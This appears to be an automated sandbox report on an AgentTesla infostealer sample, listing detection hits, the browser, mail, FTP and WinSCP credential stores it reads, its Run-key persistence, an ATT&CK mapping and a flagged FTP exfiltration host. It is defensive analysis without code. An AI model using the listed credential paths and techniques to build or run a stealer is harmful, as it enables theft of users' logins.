                    Source: Yara matchFile source: 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4171800763.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1923594429.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rMT103_126021720924.exe PID: 2828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rMT103_126021720924.exe PID: 6860, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7704, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.48269a0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4171996023.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4171800763.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1923594429.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rMT103_126021720924.exe PID: 2828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rMT103_126021720924.exe PID: 6860, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7704, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.48269a0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4171800763.000000000285C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1923594429.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4171996023.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4171996023.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4171800763.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1923594429.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rMT103_126021720924.exe PID: 2828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rMT103_126021720924.exe PID: 6860, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7320, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7704, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		31
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model31
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets2
                    Process Discovery                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546259 Sample: rMT103_126021720924.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 34 ftp.haliza.com.my 2->34 36 api.ipify.org 2->36 38 15.164.165.52.in-addr.arpa 2->38 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 9 other signatures 2->62 7 rMT103_126021720924.exe 3 2->7         started        11 sgxIb.exe 2 2->11         started        13 sgxIb.exe 3 2->13         started        signatures3 process4 file5 32 C:\Users\user\...\rMT103_126021720924.exe.log, ASCII 7->32 dropped 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->64 66 Contains functionality to register a low level keyboard hook 7->66 68 Injects a PE file into a foreign processes 7->68 15 rMT103_126021720924.exe 16 5 7->15         started        20 sgxIb.exe 11->20         started        70 Multi AV Scanner detection for dropped file 13->70 72 Machine Learning detection for dropped file 13->72 22 sgxIb.exe 14 2 13->22         started        24 sgxIb.exe 13->24         started        26 sgxIb.exe 13->26         started        signatures6 process7 dnsIp8 40 ftp.haliza.com.my 110.4.45.197, 21, 49662, 49704 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 15->40 42 api.ipify.org 104.26.12.205, 443, 49732, 49740 CLOUDFLARENETUS United States 15->42 28 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 15->28 dropped 30 C:\Users\user\...\sgxIb.exe:Zone.Identifier, ASCII 15->30 dropped 44 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->44 46 Tries to steal Mail credentials (via file / registry access) 15->46 48 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->48 50 Tries to harvest and steal ftp login credentials 20->50 52 Tries to harvest and steal browser information (history, passwords, etc) 20->52 54 Installs a global keyboard hook 20->54 file9 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    rMT103_126021720924.exe32%ReversingLabs
                    rMT103_126021720924.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe32%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		unknown
                      ftp.haliza.com.my
                      		110.4.45.197
                      		truetrue
                        		unknown
                        15.164.165.52.in-addr.arpa
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.fontbureau.comrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersGrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/?rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/bTherMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://account.dyn.com/rMT103_126021720924.exe, 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.tiro.comrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.goodfont.co.krrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.ipify.org/trMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.00000000027EC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTherMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.ipify.orgrMT103_126021720924.exe, 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1916038959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.00000000027EC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-user.htmlrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ftp.haliza.com.myrMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.000000000285C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.0000000002916000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.0000000002948000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.jiyu-kobo.co.jp/rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaserMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers8rMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sandoll.co.krrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.deDPleaserMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerMT103_126021720924.exe, 00000002.00000002.4171996023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000006.00000002.1923594429.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000000B.00000002.4171800763.00000000027EC000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sakkal.comrMT103_126021720924.exe, 00000000.00000002.1721351951.0000000006E82000.00000004.00000800.00020000.00000000.sdmp, rMT103_126021720924.exe, 00000000.00000002.1721207014.00000000057D0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.26.12.205
                              		api.ipify.orgUnited States
                              		13335CLOUDFLARENETUSfalse
                              110.4.45.197
                              		ftp.haliza.com.myMalaysia
                              		46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1546259
                              Start date and time:2024-10-31 17:02:05 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 10m 7s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:13
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:rMT103_126021720924.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@13/4@4/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 394
                              • Number of non-executed functions: 34
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: rMT103_126021720924.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              12:02:59API Interceptor7919468x Sleep call for process: rMT103_126021720924.exe modified
                              12:03:11API Interceptor6284530x Sleep call for process: sgxIb.exe modified
                              16:03:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              16:03:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.26.12.205Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                              • api.ipify.org/
                              perfcc.elfGet hashmaliciousXmrigBrowse
                              • api.ipify.org/
                              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                              • api.ipify.org/
                              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                              • api.ipify.org/
                              hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              110.4.45.197z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                        DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                            Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                              rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                                z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  api.ipify.orgu9aPQQIwhj.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 172.67.74.152
                                                  Shipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 172.67.74.152
                                                  file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                  • 104.26.13.205
                                                  Proforma Invoice.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.26.13.205
                                                  file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                  • 104.26.12.205
                                                  #Uad6c#Ub9e4 #Uc8fc#Ubb38 658749 #Ubc0f 658752..exeGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.74.152
